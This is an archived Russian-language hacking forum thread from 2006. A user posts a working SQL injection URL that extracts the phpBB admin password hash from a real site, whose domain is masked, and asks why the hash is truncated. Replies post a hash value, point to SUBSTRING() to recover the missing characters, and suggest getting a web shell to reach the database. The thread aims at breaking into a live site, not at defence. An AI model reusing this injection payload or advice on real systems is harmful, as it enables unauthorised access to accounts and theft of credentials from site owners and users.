Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
sql inj in phpbb & hashs length |

16.04.2006, 12:51
|
|
Green member - Level 3
Регистрация: 08.10.2005
Сообщений: 396
Провел на форуме: 400609
Репутация:
239
|
|
sql inj in phpbb & hashs length
Вот допустим есть такой линк:
Код:
http://www.*/forum/index.php?s=-1 UNION SELECT 0,user_password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM phpbb_users WHERE user_id=2
получаю админский хэш, но длинной всего 30 символов.
Кто мне скажет - куда еще 2 байта девались?
Тестил на некоторых других форумах - там все чики-пуки.
Изучение сорсов phpbb результата не дали.
__________________
Никому нельзя верить...
Последний раз редактировалось qBiN; 17.04.2006 в 15:55..
Причина: написано ниже
|
|
|

16.04.2006, 16:33
|
|
Новичок
Регистрация: 10.04.2006
Сообщений: 6
Провел на форуме: 2957
Репутация:
0
|
|
c00f0ee5194ba0f5d9db575f5e567b нормальный хеш, чего тебе не нравится.
|
|
|

16.04.2006, 16:36
|
|
Постоянный
Регистрация: 28.02.2005
Сообщений: 853
Провел на форуме: 3369632
Репутация:
749
|
|
|
|
|

16.04.2006, 17:13
|
|
Green member - Level 3
Регистрация: 08.10.2005
Сообщений: 396
Провел на форуме: 400609
Репутация:
239
|
|
Nemesis
Я же написал что мне не нравится - в нем 30 символов 0-9a-f, а в md5 32.
Zadoxlik
Ты прости меня пожалуйста за мой ламоризм - я внимательным образом изучил исходники и не нашел ответа на мой вопрос.
Но может ты, как автор этого кода, попробуешь объяснить мне более развернутым ответом?
__________________
Никому нельзя верить...
|
|
|

16.04.2006, 17:21
|
|
Участник форума
Регистрация: 17.12.2005
Сообщений: 121
Провел на форуме: 551495
Репутация:
227
|
|
Может там пхпбб с каким-то хаком стоит?
Попробуй из других полей информацию получить, например с имени, что будет?
|
|
|

16.04.2006, 17:37
|
|
Time out
Регистрация: 28.11.2005
Сообщений: 547
Провел на форуме: 2320925
Репутация:
1348
|
|
Ни с каким хаком. Это специфика эксплойта. Посмотри последнее видео про взлом phpBB. Там посление два символа через SUBSTRING() достаются.
|
|
|

16.04.2006, 17:38
|
|
Постоянный
Регистрация: 28.02.2005
Сообщений: 853
Провел на форуме: 3369632
Репутация:
749
|
|
Ну это типа получишь вебшел, а оттуда доступ к БД и бери хуч какой хэш. А так, похожий вопрос уже был, надо пользовать субстринг
|
|
|

17.04.2006, 15:54
|
|
Постоянный
Регистрация: 20.01.2005
Сообщений: 899
Провел на форуме: 1535446
Репутация:
182
|
|
Разве нельзя использовать 30-символьный мд5? если админ шибко умный, то может обрезать 2 символа из хеша,при сравнении делать таки же операции...Хотя это очень маловероятно
В следущий раз темы с обсуждением конкретных сайтов будут перекидываться в просьбы о взломах.
|
|
|

17.04.2006, 15:54
|
|
Новичок
Регистрация: 16.11.2004
Сообщений: 29
Провел на форуме: 47488
Репутация:
-2
|
|
Народ не в падлу не бейте ногами и репу не снижайте))) Вообщем я там чисто разобраться хотел...решил Sql поучить....вот с Xss всё понятно, а тут...
Сами запросы вполне понятны, вот тока непонятно наличие массового кол-ва нулей, объясните плз зачем они есть
|
|
|

17.04.2006, 15:59
|
|
Постоянный
Регистрация: 20.01.2005
Сообщений: 899
Провел на форуме: 1535446
Репутация:
182
|
|
Давай ты создашь отдельную тему в определенном разделе(уязвимости веб-приложений) и задашь свой вопрос.
Итак ответ на вопрос получен тема благополучно закрывается.
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|